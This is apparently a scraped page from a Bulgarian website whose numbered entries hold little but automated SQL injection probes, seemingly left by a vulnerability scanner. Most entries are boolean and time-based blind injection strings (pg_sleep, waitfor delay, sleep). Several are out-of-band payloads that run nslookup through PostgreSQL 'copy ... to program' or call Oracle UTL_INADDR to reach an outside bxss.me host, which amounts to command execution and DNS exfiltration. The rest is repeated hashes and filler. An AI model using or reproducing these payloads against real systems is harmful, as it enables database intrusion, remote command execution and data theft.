 214. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 -1 OR 3*2<(0+5+719-719) --

  1

 215. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 -1 OR 3+719-719-1=0+0+0+1 --

  1

 216. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 -1 OR 2+719-719-1=0+0+0+1 --

  1

 217. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 218. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 219. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 e

  620'

 220. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 e

  1';copy (select '') to program 'nslookup dns.sqli.\013405.299-180.299.60254.\1.bxss.me

 221. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 e

  1;copy (select '') to program 'nslookup dns.sqli.\013405.299-178.299.60254.\1.bxss.me'

 222. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 e

  '||UTL_INADDR.get_host_address('dns.'||'sqli.013405.299-175.299.60254.1.bxss'||'.me')||'

 223. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 e

  1||UTL_INADDR.get_host_address('dns.'||'sqli.013405.299-172.299.60254.1.bxss'||'.me')

 224. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 e

  ''||(select 1 from (select pg_sleep(8.984))x)||''

 225. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 e

  '||(select 1 from (select pg_sleep(26.951999999999998))x)||'

 226. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 e

  L2qvVu2H'));select pg_sleep(17.968); --

 227. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 e

  XIls1Wid');select pg_sleep(8.984); --

 228. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 e

  hL2kgDN1';select pg_sleep(8.984); --

 229. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 e

  -1));select pg_sleep(26.951999999999998); --

 230. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 e

  -1);select pg_sleep(17.968); --

 231. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 e

  -1;select pg_sleep(17.968); --

 232. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 e

  mG67UA8U'; waitfor delay '0:0:8.984' --

 233. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 e

  1 waitfor delay '0:0:26.951999999999998' --

 234. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 e

  -1); waitfor delay '0:0:17.968' --

 235. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 e

  -1; waitfor delay '0:0:17.968' --

 236. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 e

  (select(0)from(select(sleep(8.984)))v)/*'+(select(0)from(select(sleep(8.984)))v)+'"+(select(0)from(select(sleep(8.984)))v)+"*/

 237. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 e

  if(now()=sysdate(),sleep(8.984),0)/*'XOR(if(now()=sysdate(),sleep(8.984),0))OR'"XOR(if(now()=sysdate(),sleep(8.984),0))OR"*/

 238. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 e

  -1" OR 3*2>(0+5+908-908) --

 239. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 e

  -1" OR 3*2<(0+5+908-908) --

 240. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 e

  -1" OR 3+908-908-1=0+0+0+1 --

 241. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 e

  -1" OR 2+908-908-1=0+0+0+1 --

 242. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 e

  -1' OR 3*2>(0+5+402-402) or 'ZvCLKvQK'='

 243. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 e

  -1' OR 3*2<(0+5+402-402) or 'ZvCLKvQK'='

 244. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 e

  -1' OR 3+402-402-1=0+0+0+1 or 'ZvCLKvQK'='

 245. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 e

  -1' OR 2+402-402-1=0+0+0+1 or 'ZvCLKvQK'='

 246. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 e

  -1' OR 3*2>(0+5+154-154) --

 247. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 e

  -1' OR 3*2<(0+5+154-154) --

 248. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 e

  -1' OR 3+154-154-1=0+0+0+1 --

 249. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 e

  -1' OR 2+154-154-1=0+0+0+1 --

 250. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 e

  -1 OR 3*2>(0+5+640-640)

 251. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 e

  -1 OR 3*2<(0+5+640-640)

 252. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 e

  -1 OR 3+640-640-1=0+0+0+1

 253. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 e

  -1 OR 2+640-640-1=0+0+0+1

 254. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 e

  -1 OR 3*2>(0+5+743-743) --

 255. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 e

  -1 OR 3*2<(0+5+743-743) --

 256. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 e

  -1 OR 3+743-743-1=0+0+0+1 --

 257. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 e

  -1 OR 2+743-743-1=0+0+0+1 --

 258. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 e

  1

 259. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 e

  1

Tози сайт използва "Бисквитки". Научи повече Приемам

Моля, запознайте се с нашите Общи условия и Политика за поверителност